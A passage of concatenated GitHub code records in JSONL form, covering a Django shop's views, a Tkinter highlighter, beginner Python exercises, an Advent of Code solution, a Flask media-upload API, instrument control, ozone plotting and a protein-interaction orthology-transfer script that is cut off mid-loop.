'category': cat,\r\n 'subCategory': subcat,\r\n 'subCategories': subCategories,\r\n }\r\n print(products)\r\n #print(subcat)\r\n #print(subCategories)\r\n #print(check)\r\n return render(request, template, context)\r\n\r\ndef productDetail(request, cat, subcat, slug):\r\n try:\r\n products = Product.objects.get(slug=slug)\r\n # random_products = Product.objects.filter(category__title=subcat)\r\n products_id_list = list(Product.objects.filter(category__title=subcat).values_list('id', flat=True))\r\n random_products_id_list = random.sample(products_id_list, min(len(products_id_list), 3))\r\n random_products = Product.objects.filter(id__in=random_products_id_list)\r\n # random_products_id_list = random.sample(cat_products_id_list, min(len(cat_products_id_list), 3))\r\n product_image = ProductImages.objects.filter(product__slug=slug)\r\n except:\r\n #products = None\r\n raise Http404\r\n template = 'products/productsDetail.html'\r\n context = {\r\n 'p': products,\r\n 'cat': cat,\r\n 'subcat': subcat,\r\n 'slug': slug,\r\n 'random_products': random_products,\r\n 'product_image': product_image,\r\n 'subcat_s': subcat[:len(subcat)-1],\r\n }\r\n return render(request, template, context)\r\n\r\ndef search(request):\r\n try:\r\n s = request.GET['search']\r\n except:\r\n s = None\r\n # raise Http404\r\n if s:\r\n products = Product.objects.filter(Q(title__icontains=s) | Q(category__title=s))\r\n else:\r\n products = None\r\n template = 'search/search.html'\r\n context = {\r\n 'query': s,\r\n 'products': products,\r\n }\r\n return render(request, template, context)\r\n #print(s)","repo_name":"raczu/django-ecommerce","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28389959535","text":"import Tkinter as tk\nimport tkFont\n'''\nCreated on Sep 23, 2014\nA text widget with a new method, HighlightPattern \n\n example:\n\n text = CustomText()\n text.tag_configure(\"red\",foreground=\"#ff0000\")\n text.HighlightPattern(\"this should be red\", \"red\")\n\n The highlight_pattern method is a simplified python \n version of the tcl code at http://wiki.tcl.tk/3246\n \n@author: amita\n'''\nclass CustomText(tk.Text):\n \n def __init__(self,text):\n tk.Text.__init__(self)\n self.insert(tk.INSERT ,text)\n\n def highlight_pattern(self, pattern, tag, start=\"1.0\", end=\"end\", regexp=False):\n '''Apply the given tag to all text that matches the given pattern\n\n If 'regexp' is set to True, pattern will be treated as a regular expression\n '''\n\n start = self.index(start)\n end = self.index(end)\n self.mark_set(\"matchStart\",start)\n self.mark_set(\"matchEnd\",start)\n self.mark_set(\"searchLimit\", end)\n\n countVar = tk.StringVar()\n while True:\n \n index = self.search(\"car\", stopindex=\"end\", count=countVar)\n if index == \"\": break\n self.mark_set(\"matchStart\", index)\n self.mark_set(\"matchEnd\", \"%s+%sc\" % (index,countVar.get()))\n self.tag_add(tag, \"matchStart\",\"matchEnd\")\n\n \nif __name__ == '__main__':\n text = CustomText(\"this should be red\")\n text.tag_configure(\"red\",foreground=\"#ff0000\")\n text.highlight_pattern(\"this should be red\", \"red\")\n ","repo_name":"amitamisra/Summary_Dialogs","sub_path":"Summary/src/GUI/DisplayArguments_PDTBParser.py","file_name":"DisplayArguments_PDTBParser.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30282821080","text":"# SOMANDO APENAS OS PARES\n\na = []\ns = 0\np = 0\nfor i in range(0, 6):\n n = int(input('Digite o {}o número: _ ' .format(i + 1)))\n a.append(n)\n if n % 2 == 0: # o número digitado é par\n s += n\n p += 1\n\nprint('\\nVocê digitou os seguintes números:')\nfor i in a:\n print(i, end=' ')\n\nprint('\\n\\nDentre eles, {} são pares:' .format(p))\nfor i in a:\n if i % 2 == 0:\n print(i, end=' ')\n\nprint('\\n\\nA soma dos números acima mencionados é {}.' .format(s))","repo_name":"pbittencourt/datasciencestudies","sub_path":"guanabara/Exercicios/mundo 2 _ aulas 12 a 15/050.py","file_name":"050.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34806193428","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nimport time\nfrom scoreboard import Scoreboard\n\nscoreboard = Scoreboard()\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\nplayer = Player()\ncars = CarManager()\n\nscreen.listen()\n\n\nscreen.onkey(player.up,\"Up\")\nscreen.onkey(player.down, \"Down\")\ngame_is_on = True\nwhile game_is_on:\n\n time.sleep(cars.speed)\n screen.update()\n cars.create_cars()\n cars.move()\n\n if player.ycor()>=280:\n scoreboard.increment_score()\n cars.increase_speed()\n player.return_to_origin()\n for car in cars.all_cars:\n if car.distance(player)<=15:\n scoreboard.game_over()\n game_is_on = False\n\n\nscreen.exitonclick()","repo_name":"Aizad-eng/Turtle-crossing-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73330690346","text":"\"\"\"\n\nCreated on 2022/02\n\nAuthor: Jahns_P\nVersion Number: 2\nDate of last change: 2022/02/16\nRequires: R&S HMF25xx, FW 02.301 or newer\n- Installed RsInstrument Python module (see https://rsinstrument.readthedocs.io/en/latest/)\n- Installed VISA e.g. R&S Visa 5.12.x or newer\n\nDescription: Send an ARB waveform to the instrument and provide the ARB signal to the output\n\nGeneral Information:\nThis example does not claim to be complete. All information has been\ncompiled with care. However, errors can not be ruled out.\n\"\"\"\n\nfrom RsInstrument import *\nfrom time import sleep\n\n\nRsInstrument.assert_minimum_version('1.53.0')\ninstr = RsInstrument('TCPIP::10.205.0.72::5025::SOCKET', True, True, # Init with IDN query and reset\n \"SelectVisa='rs',\" # VISA type selection (valid parameters: rs or ni)\n \" Termination Character='\\n',\" # Just to show how this is done. \\n ist standard termination. \n \" AssureWriteWithTermChar = True\") # Be sure to have all commands terminated with \\n\nsleep(1)\nidn = instr.query_str('*IDN?')\nprint(f\"\\nHello, I am: '{idn}'\")\n\n# We assume the following amplitude values to be defined for a triangle waveform:\n# 0 / 32767 / 0 / -32768 / 0\nbin_data = bytes([00, 00, 0x7F, 0xFF, 00, 00, 0x80, 00, 00, 00])\ninstr.write_bin_block(\"DATA \", bin_data) # Transfer the ARB data to the instrument\ninstr.write_str('FREQ 3000') # Set Frequency to 3 kHz\ninstr.write_str('VOLT 2') # Voltage is 2 V(pp) now\ninstr.write_str('FUNC:ARB RAM') # Arbitrary function working from memory\ninstr.query_opc()\ninstr.write_str('FUNC ARB') # Change to ARB mode\ninstr.write_str('OUTP ON') # Switch output on\ninstr.query_opc()\n\nprint('\\n')\nprint('Arb File transferred to memory, ARB mode is active, output state is ON')\n\ninstr.close() # And close the connection finally\n","repo_name":"Rohde-Schwarz/Examples","sub_path":"Misc/Python/RsInstrument/RsInstrument_HMF25xx_load_ARB_man.py","file_name":"RsInstrument_HMF25xx_load_ARB_man.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"42087149082","text":"n, l, k = map(int, input().split())\nquestions = []\n\nfor _ in range(n):\n sub1, sub2 = map(int, input().split())\n questions.append((sub1, sub2))\n\nquestions.sort(key=lambda x : x[1])\n\neasy = hard = 0\nfor x, y in questions:\n if k == 0:\n break\n if l >= y:\n hard += 1\n k -= 1\n elif l >= x:\n easy += 1\n k -= 1\n\nresult = hard * 140 + easy * 100\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution579.py","file_name":"solution579.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37829427847","text":"# https://adventofcode.com/2022/day/5\n\n\n# [F] [L] [M] \n# [T] [H] [V] [G] [V] \n# [N] [T] [D] [R] [N] [D] \n# [Z] [B] [C] [P] [B] [R] [Z] \n# [M] [J] [N] [M] [F] [M] [V] [H]\n# [G] [J] [L] [J] [S] [C] [G] [M] [F]\n# [H] [W] [V] [P] [W] [H] [H] [N] [N]\n# [J] [V] [G] [B] [F] [G] [D] [H] [G]\n# 1 2 3 4 5 6 7 8 9 \n\ndef main():\n\n l = []\n\n stack = []\n\n supplies = []\n\n with open('input.txt', 'r') as file:\n for line in file:\n if line != '\\n':\n l.append(line)\n else: \n break\n for s in l:\n row = []\n newString = s[1::4]\n for ch in newString:\n row.append(ch)\n stack.append(row)\n stack.pop()\n\n\n n = len(stack)\n for i in range(len(stack[n-1])):\n tmp = []\n for j in range(n-1, -1, -1):\n if stack[j][i] == ' ':\n continue\n else:\n tmp.append(stack[j][i])\n supplies.append(tmp)\n # print(supplies)\n\n# PART ONE (COMMENT PART TWO TO RUN)\n# with open('input.txt', 'r') as file:\n# for line in file:\n# if 'move' not in line:\n# continue\n# else:\n# move, frm, to = [int(s) for s in line.split() if s.isdigit()]\n\n# for i in range(move):\n# tmp = supplies[frm-1].pop()\n# supplies[to-1].append(tmp)\n\n# PART TWO (COMMENT PART ONE TO RUN)\n with open('input.txt', 'r') as file:\n for line in file:\n if 'move' not in line:\n continue\n else:\n move, frm, to = [int(s) for s in line.split() if s.isdigit()]\n\n tmpList = []\n for i in range(move):\n tmp = supplies[frm-1].pop()\n tmpList.append(tmp)\n\n\n tmpList.reverse()\n for i in range(len(tmpList)):\n supplies[to-1].append(tmpList[i])\n\n\n\n final = ''\n for i in range(len(supplies)):\n final += supplies[i][-1]\n\n print(final)\n\n\n \n\n\n\n\n \n\n\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"kennea99/Advent-of-Code-2022","sub_path":"Day 5/supplyStacks.py","file_name":"supplyStacks.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14425744679","text":"# Sort an array in wave form\n\ndef sortInWave(arr, n):\n for i in range(0, n - 1, 2):\n if i > 0 and arr[i] < arr[i - 1]:\n arr[i], arr[i - 1] = arr[i - 1], arr[i]\n\n if i < n - 1 and arr[i] < arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n\n\narr = [10, 90, 49, 2, 1, 5, 23]\nsortInWave(arr, len(arr))\nprint(arr)\n\n\ndef waveForm_sort(arr):\n n = len(arr)\n for i in range(n):\n for j in range(0, n - i - 1):\n if j % 2 == 0:\n if arr[j] > arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n else:\n if arr[j] < arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n\narr = [3, 1, 4, 2, 5]\nwaveForm_sort(arr)\nprint(arr)\n","repo_name":"rahulktd/python_mini_projects","sub_path":"Task4/1/sort_an_array_in_wave_form.py","file_name":"sort_an_array_in_wave_form.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31563169778","text":"import glob, os\nimport hashlib\nimport re\nfrom flask import (request, jsonify, url_for, send_from_directory)\nfrom flask_jwt_extended import (jwt_required, get_jwt_identity)\nfrom werkzeug.utils import secure_filename\nfrom PIL import Image\n\nfrom app import (app, mongo)\nfrom app.media.media_utils import (ALLOWED_EXTENSIONS)\nfrom app.media.media_processing import (process_media_file, create_media_directories)\nfrom app.utils.api_responses import (json_success, json_bad_request_error)\n\n\nlog = app.logger\n\n\nNO_FILE_EXISTS = 0\nSAME_FILE_EXISTS = 1\nOTHER_FILE_EXISTS = 2\n\n\n# predefine regex pattern for filename counters (underscore and number directly before file extension)\nfilename_counter_pattern = re.compile('_([0-9]+)$')\n\n\n@app.route('/upload/media', methods=['POST'])\n@jwt_required\ndef on_post_upload_media():\n\n # check if the post request has the file part\n if 'file' not in request.files:\n return json_bad_request_error('NO_FILE_SELECTED', 'no file selected')\n\n uploaded_file = request.files['file']\n # if user does not select a file, the browser also submits an empty part without filename\n if uploaded_file.filename == '':\n return json_bad_request_error('FILE_NAME_MISSING', 'file name missing')\n\n basename, extension = os.path.splitext(uploaded_file.filename)\n\n if not extension:\n return json_bad_request_error('FILE_EXTENSION_NOT_SUPPORTED', 'file extension not supported: ' + uploaded_file.filename)\n\n extension = extension[1:].lower()\n if extension not in ALLOWED_EXTENSIONS:\n return json_bad_request_error('FILE_EXTENSION_NOT_SUPPORTED', 'file extension not supported: ' + uploaded_file.filename)\n\n # save file\n file_name = save_file(uploaded_file)\n\n # process file and pass URLs and meta info\n response = process_media_file(file_name, extension)\n return jsonify(response), 200\n\n\ndef save_file(uploaded_file):\n\n file_name = secure_filename(uploaded_file.filename)\n while True:\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_name)\n existing_file = check_existing_file(file_path, uploaded_file)\n if existing_file == OTHER_FILE_EXISTS:\n # try another file name\n file_name = find_alternative_filename(file_name)\n elif existing_file == SAME_FILE_EXISTS:\n # just continue (no need to save the same file again)\n return file_name\n else:\n # save file\n uploaded_file.save(file_path)\n return file_name\n\n\ndef check_existing_file(filepath, uploaded_file):\n\n if not os.path.exists(filepath): return NO_FILE_EXISTS\n\n with open(filepath, 'rb') as existing_file:\n existing_hash = generate_hash(existing_file)\n\n uploaded_hash = generate_hash(uploaded_file)\n uploaded_file.seek(0)\n\n if existing_hash == uploaded_hash:\n log.info(f\"file {filepath} with same hash already exists: {existing_hash}\")\n return SAME_FILE_EXISTS\n else:\n log.info(f\"file {filepath} with other hash already exists: {existing_hash} instead of uploaded {uploaded_hash}\")\n return OTHER_FILE_EXISTS\n\n\ndef generate_hash(stream):\n BUF_SIZE = 1048576 # 1 MB\n result = hashlib.sha256()\n while True:\n data = stream.read(BUF_SIZE)\n if not data:\n return result.hexdigest()\n result.update(data)\n\n\ndef find_alternative_filename(filename):\n name, extension = os.path.splitext(filename)\n counter_match = filename_counter_pattern.search(name)\n\n # in case there is no counter yet, insert a new one\n if not counter_match:\n return name + \"_2\" + extension\n\n # otherwise replace the counter\n counter = int(counter_match[1]) + 1\n counter_start = counter_match.start(1)\n counter_end = counter_match.end(1)\n return name[:counter_start] + str(counter) + name[counter_end:] + extension\n\n\n@app.route('/uploads/', methods=['GET'])\ndef on_get_uploaded_file(filename):\n log.info(\"serving upload file \" + filename + \" from \" + app.config['UPLOAD_FOLDER'])\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\n@app.route('/thumbnails/', methods=['GET'])\ndef on_get_thumbnail_file(filename):\n log.info(\"serving thumbnail file \" + filename + \" from \" + app.config['THUMBNAIL_FOLDER'])\n return send_from_directory(app.config['THUMBNAIL_FOLDER'], filename)\n\n\n@app.route('/fullhd/', methods=['GET'])\ndef on_get_fullhd_file(filename):\n log.info(\"serving FullHD file \" + filename + \" from \" + app.config['FULLHD_FOLDER'])\n return send_from_directory(app.config['FULLHD_FOLDER'], filename)\n\n@app.route('/videoframes/', methods=['GET'])\ndef on_get_videoframe_file(filename):\n log.info(\"serving video frame file \" + filename + \" from \" + app.config['VIDEO_FRAME_FOLDER'])\n return send_from_directory(app.config['VIDEO_FRAME_FOLDER'], filename)\n","repo_name":"museum4punkt0/MusOS-museum4punkt0","sub_path":"server/modules/app/api/media_api.py","file_name":"media_api.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8051996711","text":"import cartopy as cp # Globe projections\nimport cartopy.util as ccrs_util # Add cyclic\nfrom cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter\nfrom scipy.constants import * # Get physics constants\nimport datetime as dt\nfrom mytools.met_tools import *\nfrom mytools.netcdf_tools import *\n\nmonth = '12'\n# Data source\nnc_src_corr = os.environ['DATA']+'/abel/C3RUN_nitrate_corr_2005/scavenging_daily/scavenging_daily_2d_2005'+month+'*.nc'\nnc_src_emep = os.environ['DATA']+'/abel/C3RUN_emep.090318.9433/scavenging_daily/scavenging_daily_2d_2005'+month+'*.nc'\n\ntry:\n data\nexcept NameError:\n data_list = []\n for subdir in (nc_src_corr,nc_src_emep):\n raw_data = []\n print(\"Reading from path %s\" % (os.path.abspath(subdir)))\n # Open dataset\n for file in sorted(glob.glob(subdir)):\n print(\"Reading %s\" % (os.path.basename(file)))\n data = xr.open_dataset(file)\n # Defining new time coordinates\n data.coords['time'] = dt.datetime(data['YEAR'], data['MONTH'], data['DAY'])\n raw_data.append(data['dry_O3'])\n # Concatenating the list\n data_list.append(xr.concat(raw_data, dim='time'))\n\nozone_data = [data/mega for data in data_list]\nfor data in ozone_data :\n data.attrs['unit'] = 'Gg'\n# Plot it\nplt.close('all')\nfig1 = plt.figure(1,figsize=(16,9))\nfig1.canvas.set_window_title(\"compare-zonal_average_ozone_drydep-timeline-%s\" % month)\nax11 = plt.subplot(131)\nax12 = plt.subplot(132)\nax13 = plt.subplot(133)\nozone_data[0].mean(dim='lon').plot(ax=ax11, add_colorbar=False)\nozone_data[1].mean(dim='lon').plot(ax=ax12,\n cbar_kwargs={'label':'%s Dry Dep (%s)' %\n ('O$_3$', ozone_data[1].attrs['unit'])})\n\n(100*(ozone_data[1].mean(dim='lon')-ozone_data[0].mean(dim='lon'))/ozone_data[0].mean(dim='lon')).plot(ax=ax13,\n cbar_kwargs={'label':'%s Dry Dep (%s)' %\n ('$\\Delta O_3$', '%')})\nfor ax in fig1.axes:\n ax.set_xlabel('Latitude (deg)')\nax12.set_ylabel('')\nax12.set_yticklabels('')\nax13.set_ylabel('')\nax13.set_yticklabels('')\n\nfig2 = plt.figure(2, figsize=(16,9))\nfig2.canvas.set_window_title(\"compare-zonal_average_ozone_drydep-%s\" % month)\nax21 = plt.subplot(121)\nax22 = plt.subplot(122)\nozone_data[0].sum(dim='time').mean(dim='lon').plot(ax=ax21, label='base')\nozone_data[1].sum(dim='time').mean(dim='lon').plot(ax=ax21, label='emep')\n#for itime in np.arange(len(ozone_data[1].time)):\n# ozone_data[0].isel(time=itime).mean(dim='lon').plot(ax=ax22, ls=':',color='grey')\n# ozone_data[1].isel(time=itime).mean(dim='lon').plot(ax=ax22, ls='--',color='grey')\nozone_data[0].mean(dim='time').mean(dim='lon').plot(ax=ax22, label='base')\nax22.fill_between(ozone_data[0].lat,\n ozone_data[0].mean(dim='time').mean(dim='lon')-\n ozone_data[0].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n ozone_data[0].mean(dim='time').mean(dim='lon')+\n ozone_data[0].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n alpha=0.5)\nozone_data[1].mean(dim='time').mean(dim='lon').plot(ax=ax22, label='emep')\nax22.fill_between(ozone_data[0].lat,\n ozone_data[1].mean(dim='time').mean(dim='lon')-\n ozone_data[1].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n ozone_data[1].mean(dim='time').mean(dim='lon')+\n ozone_data[1].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n alpha=0.5)\nax21.set_title(\"Zonal average of monthly sums\")\nax21.legend()\nax22.set_title(\"Zonal average and daily variation\")\nax22.legend()\nfor ax in fig2.axes:\n ax.set_xlabel('Latitude (deg)')\n ax.set_ylabel('$O_3^{drydep}$ (%s)' % ozone_data[0].unit)\n# Show it\nplt.show(block=False)\n","repo_name":"ziu1986/python_scripts","sub_path":"OsloCTM3dd/qc_drydep_2.py","file_name":"qc_drydep_2.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15797663418","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .phone import Phone\n\n@dataclass\nclass OnlineMeetingInfo(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # The ID of the conference.\n conference_id: Optional[str] = None\n # The external link that launches the online meeting. This is a URL that clients launch into a browser and will redirect the user to join the meeting.\n join_url: Optional[str] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # All of the phone numbers associated with this conference.\n phones: Optional[List[Phone]] = None\n # The preformatted quick dial for this call.\n quick_dial: Optional[str] = None\n # The toll free numbers that can be used to join the conference.\n toll_free_numbers: Optional[List[str]] = None\n # The toll number that can be used to join the conference.\n toll_number: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> OnlineMeetingInfo:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: OnlineMeetingInfo\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return OnlineMeetingInfo()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .phone import Phone\n\n from .phone import Phone\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"conferenceId\": lambda n : setattr(self, 'conference_id', n.get_str_value()),\n \"joinUrl\": lambda n : setattr(self, 'join_url', n.get_str_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"phones\": lambda n : setattr(self, 'phones', n.get_collection_of_object_values(Phone)),\n \"quickDial\": lambda n : setattr(self, 'quick_dial', n.get_str_value()),\n \"tollFreeNumbers\": lambda n : setattr(self, 'toll_free_numbers', n.get_collection_of_primitive_values(str)),\n \"tollNumber\": lambda n : setattr(self, 'toll_number', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_str_value(\"conferenceId\", self.conference_id)\n writer.write_str_value(\"joinUrl\", self.join_url)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_collection_of_object_values(\"phones\", self.phones)\n writer.write_str_value(\"quickDial\", self.quick_dial)\n writer.write_collection_of_primitive_values(\"tollFreeNumbers\", self.toll_free_numbers)\n writer.write_str_value(\"tollNumber\", self.toll_number)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/online_meeting_info.py","file_name":"online_meeting_info.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"34585675137","text":"#!/usr/bin/env python\nimport pandas as pd\nimport sys\nfrom collections import defaultdict\n\n# PSEUDO CODE\n# transfer inter-species PPI interactions to orthologs of interacting species\n# for each PPI:\n# transfer to other host:\n# for each target host:\n# find ortholog(s) (same score hits)\n# for each ortholog:\n# calculate new score, add interaction\n# transfer to other parasite:\n# for each target parasite:\n# find ortholog(s) (same score hits)\n# for each ortholog:\n# calculate new score, add interaction\n# transfer to other host-parasite pairs:\n# for each parasite-host pair:\n# find ortholog(s) (same score hits)\n# for each ortholog in host:\n# for each ortholog in parasite:\n# calculate new score, add interaction\n\n\n\ndef orthology_transfer(parasite_host_pairs_path, transfer_pairs_path, evidence_path, parasite_host_pairs_split_path, simap_rbh_path, PRIOR):\n\n # transfer inter-species PPIs \n alpha = 0.2\n\n # dict and set of host_parasite_pairs for fast look up\n parasite_host_pairs = pd.read_csv(parasite_host_pairs_path, \n sep=\"\\t\", \n header=None, \n names=[\"parasite_taxid\", \"host_taxid\"], \n dtype={\"parasite_taxid\": str, \"host_taxid\":str})\n\n parasite_host_pairs_split = pd.read_csv(parasite_host_pairs_split_path, \n sep=\"\\t\", \n header=None, \n names=[\"parasite_taxid\", \"host_taxid\"], \n dtype={\"parasite_taxid\": str, \"host_taxid\":str})\n\n # dict of transfer_pairs\n transfer_pairs = pd.read_csv(transfer_pairs_path,\n sep=\"\\t\",\n header=None,\n names=[\"class\", \"taxid1\", \"taxid2\", \"level\"], \n dtype={\"taxid1\": str, \"taxid2\":str})\n\n # load the evidence \n evidence = pd.read_csv(evidence_path,\n sep=\"\\t\",\n header=None,\n names = [\"channel\", \"taxid1\", \"protein1\", \"taxid2\", \"protein2\", \"score\"],\n dtype={\"taxid1\": str, \"taxid2\":str})\n\n\n ############\n # identify for each host-parasite pair to which host-parasite pairs I can transfer (when transferring both host and parasite)\n\n # dictionary of parasites between which I can transfer\n pp_pairs_dict = defaultdict(list)\n for row in transfer_pairs.loc[transfer_pairs[\"class\"] == \"parasite\"].iterrows():\n pp_pairs_dict[row[1][\"taxid1\"]].append(row[1][\"taxid2\"])\n\n # list of host pairs between which I can transfer\n # this is the longest list so we want to do the final look up in here\n hh_pairs_set = {\n (row[1][\"taxid1\"], row[1][\"taxid2\"])\n for row in transfer_pairs.loc[transfer_pairs[\"class\"] == \"host\"].iterrows()\n }\n hh_pairs_dict = defaultdict(list)\n for row in transfer_pairs.loc[transfer_pairs[\"class\"] == \"host\"].iterrows():\n hh_pairs_dict[row[1][\"taxid1\"]].append(row[1][\"taxid2\"])\n\n\n # dictionary which parasites infect which hosts\n parasite_host_dict = defaultdict(list)\n for row in parasite_host_pairs.iterrows():\n parasite_host_dict[row[1][\"parasite_taxid\"]].append(row[1][\"host_taxid\"])\n\n host_parasite_dict = defaultdict(list)\n for row in parasite_host_pairs.iterrows():\n host_parasite_dict[row[1][\"host_taxid\"]].append(row[1][\"parasite_taxid\"])\n\n target_dict = {}\n for row in parasite_host_pairs.iterrows():\n target_hp = []\n parasite = row[1][\"parasite_taxid\"]\n host = row[1][\"host_taxid\"]\n\n target_ps = pp_pairs_dict[parasite]\n\n for target_p in target_ps:\n target_hs = parasite_host_dict[target_p]\n\n for target_h in target_hs:\n if (host, target_h) in hh_pairs_set:\n target_hp.append((target_h, target_p))\n\n if len(target_hp) != 0:\n target_dict[host +\"_\"+ parasite] = target_hp\n\n # only 559 host-parasite pairs that can have transfer via host and parasite\n\n transferred_ppis = []\n\n # iterate over host-parasite pairs\n for row in parasite_host_pairs_split.iterrows():\n parasite = row[1][\"parasite_taxid\"]\n host = row[1][\"host_taxid\"]\n\n print(host, parasite)\n\n # select evidence from host-parasite pair\n evidence_host_parasite = evidence.loc[(evidence[\"taxid1\"] == host) & (evidence[\"taxid2\"] == parasite)]\n\n if len(evidence_host_parasite) == 0:\n continue\n\n # get all hosts and parasite between which we will transfer\n # for transferring either parasite or host\n target_hosts = set(hh_pairs_dict[host]).intersection(set(parasite_host_dict[parasite]))\n target_parasites = set(pp_pairs_dict[parasite]).intersection(set(host_parasite_dict[host]))\n # for transferring on both sides\n target_hp = target_dict.get(host +\"_\"+ parasite, [])\n target_hs = []\n target_ps = []\n for target_hp_pair in target_hp:\n target_hs.append(target_hp_pair[0])\n target_ps.append(target_hp_pair[1])\n target_ps = set(target_ps)\n target_hs = set(target_hs)\n\n # load orthology data of relevant organisms in memory\n rbh_dict = dict()\n\n for target_host in target_hs.union(target_hosts):\n rbh = pd.read_csv(simap_rbh_path + \"/{}.{}_rbh.tsv\".format(host, target_host), sep=\"\\t\", header=None, names=[\"qseqid\", \"sseqid\", \"normbitscore\", \"percident\", \"percsim\", \"qstart\", \"qend\", \"sstart\", \"send\"])\n # protein IDs of evidence does not contain taxid\n rbh['qseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n rbh['sseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n\n rbh_dict[host + \"_\" + target_host] = defaultdict(list)\n for row in rbh.iterrows():\n # possibly multiple orthologs (same score)\n rbh_dict[host + \"_\" + target_host][row[1][\"qseqid\"]].append((row[1][\"sseqid\"], row[1][\"normbitscore\"]))\n\n for target_parasite in target_ps.union(target_parasites):\n rbh = pd.read_csv(simap_rbh_path + \"/{}.{}_rbh.tsv\".format(parasite, target_parasite), sep=\"\\t\", header=None, names=[\"qseqid\", \"sseqid\", \"normbitscore\", \"percident\", \"percsim\", \"qstart\", \"qend\", \"sstart\", \"send\"])\n # protein IDs of evidence does not contain taxid\n rbh['qseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n rbh['sseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n\n rbh_dict[parasite + \"_\" + target_parasite] = defaultdict(list)\n for row in rbh.iterrows():\n # possibly multiple orthologs (same score)\n rbh_dict[parasite + \"_\" + target_parasite][row[1][\"qseqid\"]].append((row[1][\"sseqid\"], row[1][\"normbitscore\"]))\n\n # change default return value\n for key in rbh_dict.keys():\n rbh_dict[key].default_factory = lambda:False\n\n # iterate over evidence from host-parasite pair\n for ppi in evidence_host_parasite.iterrows():\n ppi = ppi[1]\n host_prot, parasite_prot, score = (ppi[\"protein1\"], ppi[\"protein2\"], ppi[\"score\"])\n\n # one-way transfer\n for target_host in target_hosts:\n # check if protein has rbh in other host\n target_proteins = rbh_dict[host + \"_\" + target_host][host_prot]\n if target_proteins:\n for target_prot in target_proteins:\n new_score = (score - PRIOR) * (target_prot[1]) ** alpha + PRIOR\n transferred_ppis.append((target_host, target_prot[0], parasite, parasite_prot, new_score))\n\n for target_parasite in target_parasites:\n # potentially multiple rbh's (identical sequences)\n 